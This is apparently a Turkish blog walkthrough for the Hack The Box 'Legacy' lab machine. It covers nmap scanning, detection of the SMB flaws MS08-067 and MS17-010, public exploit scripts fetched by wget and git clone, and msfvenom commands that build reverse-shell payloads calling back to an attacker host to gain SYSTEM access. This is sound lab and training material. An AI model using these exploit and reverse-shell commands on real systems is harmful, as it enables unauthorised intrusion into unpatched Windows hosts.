Hack The Box: Legacy Çözümü

0
404
views
Hack the Box platformu sızma testi alıştırmaları için kullanılabilecek çevrimiçi platformlardan birisidir. Bu yazıda, Hack The Box platformundaki Legacy isimli Kolay zorluktaki sanal makinenin ele geçirilmesi incelenecektir.

Legacy sanal makinesinin IP ve işletim sistemi bilgileri aşağıdaki gibidir.

  • IP Adresi: 10.10.10.4
  • İşletim Sistemi: Windows

 

A) Port Tarama

Port taraması sonucunda 2 adet portun açık olduğu tespit edilmiştir.

nmap -sV -sC -v -p- -oA fulltcp –open 10.10.10.4

 

Açık portlar aşağıdaki gibidir:

  • 445/tcp
  • 139/tcp

 

B) SMB Servisinin İncelenmesi

TCP\139 ve TCP\445 portlarını kullanan SMB protokolü üzerinde paylaşılan dosya olup olmadığına ve bu dosyaların izinlerini kontrol ediyoruz.

nmap –script smb-vuln* -p 139,445 -oN vulnscan 10.10.10.4

 

Tespit Edilen Zafiyetler:

  • smb-vuln-ms08-067
  • smb-vuln-ms17-010

 

C) MS08-067 Zafiyetinin İstismarı

MS08-067 zafiyetinin istismarı için jivoi‘nin Github üzerindeki betiği kullanılabilir.

wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

 

Bu betik ile zafiyetli hedef sistemde üretilen bir shellcode‘un çalıştırılması sağlanmaktadır. Ters bağlantı elde edebilmek için MSFVenom ile bir shellcode oluşturulabilir.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=3333 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f c -a x86 –platform windows

 

Hazırlanan C dili ile oluşturulan shellcode, betiğe eklenir.

 

Betik çalıştırıldığında zafiyet istismar edilecek ve ters bağlantı elde edilecektir. Bu bağlantıyı yakalayacak dinleyici “nc” aracı ile başlatılır. İstismar işlemi ile de NT AUTHORITY\SYSTEM yetkisi ile ters bağlantı elde edilir.

 

Benzer olarak MSF ms08_067_netapi istismar modülü de kullanılabilir.

exploit/windows/smb/ms08_067_netapi

 

user.txt dosyası elde edilebilir.

 

Benzer olarak root.txt dosyası da elde edilebilir.

 

D) MS17-010 Zafiyetinin İstismarı

MS17-010 zafiyetinin istismarı için helviojunior‘ın Github üzerindeki betiği kullanılabilir.

git clone https://github.com/helviojunior/MS17-010

 

Bu betik ile zafiyetli hedef sistemde üretilen bir uygulamanın (*.exe gibi) çalıştırılması sağlanmaktadır. Ters bağlantı elde edebilmek için MSFVenom ile bir çalıştırılabilir dosya oluşturulabilir.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 EXITFUNC=thread -f exe -a x86 –platform windows -o reverse-shell.exe

 

Betik çalıştırıldığında zafiyet istismar edilecek ve ters bağlantı elde edilecektir. Bu bağlantıyı yakalayacak dinleyici “nc” aracı ile başlatılır. İstismar işlemi ile de NT AUTHORITY\SYSTEM yetkisi ile ters bağlantı elde edilir. Böylece root.txt dosyası elde edilebilir.

 

Benzer olarak user.txt dosyası da elde edilebilir.

 

 

Kaynaklar:

https://pentestworld.blogspot.com/2019/05/hack-box-legacy.html
https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/

 

 

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

This site uses Akismet to reduce spam. Learn how your comment data is processed.